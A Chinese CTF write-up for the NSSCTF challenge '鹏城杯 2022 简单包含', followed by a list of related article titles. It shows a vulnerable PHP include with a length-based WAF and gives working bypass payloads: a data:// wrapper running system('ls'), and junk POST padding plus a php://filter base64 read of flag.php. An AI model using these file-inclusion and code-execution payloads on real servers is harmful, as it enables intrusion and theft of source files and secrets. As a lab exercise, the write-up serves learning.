NSS [鹏城杯 2022]简单包含

简介: NSS [鹏城杯 2022]简单包含

NSS [鹏城杯 2022]简单包含

看代码觉得不就直接post flag=data://text/plain,<?php system('ls');?>行了。

但是事实上没有什么软用。

用了php://伪协议之后发现有WAF

可以读源码

解码得到

<?php

$path = $_POST["flag"];

if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {

  echo 'nssctf waf!';

} else {

  @include($path);

}
?>
    
<code><span style="color: #000000">

<span style="color: #0000BB"><?php <br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"flag"</span><span style="color: #007700">]);<br /></span><span style="color: #FF8000">//flag in /var/www/html/flag.php;</span>

</span>

</code><br />

绕过方法1:

多加脏数据

绕过方法2:

换个方法加脏数据

这里好奇怪,我postman不行,火狐hackbar可以。是因为火狐hackerbar会自动url编码一次!!!

绕过方法3:

还是脏数据

a=好多个a

&flag=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php

绕过方法4:

日志包含

测不出东西。但是可以看报文,是阿帕奇服务器。

这里应该是NSS的原因,没开相关权限,不能日志包含。

目录
相关文章
|
7月前
NSS [SWPUCTF 2021 新生赛]easy_md5
NSS [SWPUCTF 2021 新生赛]easy_md5
51 0
|
7月前
|
数据安全/隐私保护
NSS [SWPUCTF 2022 新生赛]奇妙的MD5
NSS [SWPUCTF 2022 新生赛]奇妙的MD5
63 0
|
数据安全/隐私保护
SY2023CTF--“安洵杯”全国精英赛MISC--烦人的压缩包
SY2023CTF--“安洵杯”全国精英赛MISC--烦人的压缩包
110 0
|
SQL 网络协议 数据安全/隐私保护
[黑盾杯]2020之Misc篇刷题记录(16)
[黑盾杯]2020之Misc篇刷题记录(16)
536 0
|
存储 人工智能 Linux
Linux文本三剑客之sed编辑器(永远温柔永远清醒)(一)
Linux文本三剑客之sed编辑器(永远温柔永远清醒)(一)
144 0
Linux文本三剑客之sed编辑器(永远温柔永远清醒)(一)
|
Linux 开发工具 Perl
Linux文本三剑客之sed编辑器(永远温柔永远清醒)(二)
Linux文本三剑客之sed编辑器(永远温柔永远清醒)(二)
173 0
Linux文本三剑客之sed编辑器(永远温柔永远清醒)(二)
|
测试技术 API Perl
RFSoC应用笔记 - RF数据转换器 -11- RFSoC关键配置之其他功能(二)
RFSoC应用笔记 - RF数据转换器 -11- RFSoC关键配置之其他功能(二)
670 0
RFSoC应用笔记 - RF数据转换器 -11- RFSoC关键配置之其他功能(二)
|
编解码 安全 IDE
RFSoC应用笔记 - RF数据转换器 -10- RFSoC关键配置之其他功能(一)
RFSoC应用笔记 - RF数据转换器 -10- RFSoC关键配置之其他功能(一)
599 0
RFSoC应用笔记 - RF数据转换器 -10- RFSoC关键配置之其他功能(一)
|
编解码 IDE API
RFSoC应用笔记 - RF数据转换器 -08- RFSoC关键配置之RF-DAC内部解析(2.1)
RFSoC应用笔记 - RF数据转换器 -08- RFSoC关键配置之RF-DAC内部解析
594 0
RFSoC应用笔记 - RF数据转换器 -08- RFSoC关键配置之RF-DAC内部解析(2.1)
|
IDE API 开发工具
RFSoC应用笔记 - RF数据转换器 -07- RFSoC关键配置之RF-DAC内部解析(一)
RFSoC应用笔记 - RF数据转换器 -07- RFSoC关键配置之RF-DAC内部解析(一)
557 0
RFSoC应用笔记 - RF数据转换器 -07- RFSoC关键配置之RF-DAC内部解析(一)